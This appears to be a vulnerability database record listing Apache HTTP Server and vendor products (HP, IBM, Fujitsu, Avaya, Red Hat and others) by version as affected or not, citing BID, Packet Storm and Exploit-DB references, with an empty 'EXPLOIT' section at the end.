vendor:	apache	model:	apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.21	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.20	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.19	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.18	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.17	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.16	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.64	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	ne	version:	3.8.1.1	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	ne	version:	3.7.9.1	Trust: 0.3
vendor:	juniper	model:	nsm appliance generic offline for centos	scope:	ne	version:	51	Trust: 0.3
vendor:	juniper	model:	junos space 13.1r1.6	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	ne	version:	v70001.40	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	ne	version:	v70001.3.23	Trust: 0.3
vendor:	hp	model:	xp provisioning manager	scope:	ne	version:	7.0.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	ne	version:	7.1.1	Trust: 0.3
vendor:	hp	model:	p9000 tiered storage manager	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	p9000 replication manager	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	ne	version:	3.56	Trust: 0.3
vendor:	apple	model:	mac os	scope:	ne	version:	x10.8.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	ne	version:	x10.7.5	Trust: 0.3
vendor:	apache	model:	2.2.22-dev	scope:	ne	version:	-	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	2.0.65	Trust: 0.3
vendor:	redhat	model:	enterprise linux ws	scope:	eq	version:	4	Trust: 0.3
vendor:	redhat	model:	enterprise linux es	scope:	eq	version:	4	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop version	scope:	eq	version:	4	Trust: 0.3
vendor:	red	model:	hat jboss enterprise web server for rhel	scope:	eq	version:	61.0	Trust: 0.3
vendor:	red	model:	hat jboss enterprise web server for rhel server	scope:	eq	version:	51.0	Trust: 0.3
vendor:	red	model:	hat enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop client	scope:	eq	version:	5	Trust: 0.3
vendor:	red	model:	hat enterprise linux as	scope:	eq	version:	4	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	4	Trust: 0.3
vendor:	oracle	model:	application server 10g r3	scope:	eq	version:	10.1.3.5.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	ibm	model:	os/400 v6r1m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/400 v5r5m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/400 v5r4m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.11	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.5	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.19	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.17	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.15	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.13	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2.27	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.96	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.2.77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.1.73	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.68	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.64	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2.0-12	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0.103	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0.102	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0-103	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.0.95	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.0-95	Trust: 0.3
vendor:	hp	model:	system management homepage b	scope:	eq	version:	3.0.2.77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.2-77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.1-73	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.0-68	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	openvms secure web server	scope:	eq	version:	2.2	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10a	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition b	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition b	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition a	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.3	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition 9.1.0b	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	7.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l11	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l11	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10c	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10b	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10a	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition b	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition b	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.3	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 9.1.0b	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 9.1.0a	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l11	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 6.0a	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10c	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10b	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	voice portal sp2	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2.2	Trust: 0.3
vendor:	avaya	model:	message networking sp1	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	3.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.0.0.52	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp2	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp2	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.3	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.2	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp2	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp1	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp1	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.3	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.2	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.0.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.6	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.5	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.4	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.3	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.15	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.13	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.12	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.11	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.10	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.8	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.63	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.61	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.60	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.59	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.58	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.57	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.55	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.54	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.53	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.52	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.51	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.46	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.34	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.9	Trust: 0.3
vendor:	apache	model:	software foundation apache a9	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.68	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.65	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.42	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.41	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.39	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.38	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.37	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.36	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	1.3.35	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.34	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.33	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.32	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.31	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.30	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.29	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.27	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.26	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.25	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.24	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.23	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.22	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.20	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.19	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.18	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.17	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.16	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.15	Trust: 0.3
vendor:	apache	model:	software foundation apache mac	scope:	eq	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.13	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.12	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.11	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.10	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.8	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.1	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.3.38-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.3	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.7-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.6-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.5-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.21	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.20	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.19	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.18	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.17	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.16	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.15-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.64-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.62-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.61-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.60-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 1.3.40-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.35	Trust: 0.3
vendor:	ibm	model:	http server	scope:	ne	version:	7.0.0.21	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	ne	version:	7.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	ne	version:	2.2.22	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 18485

EXPLOIT

##
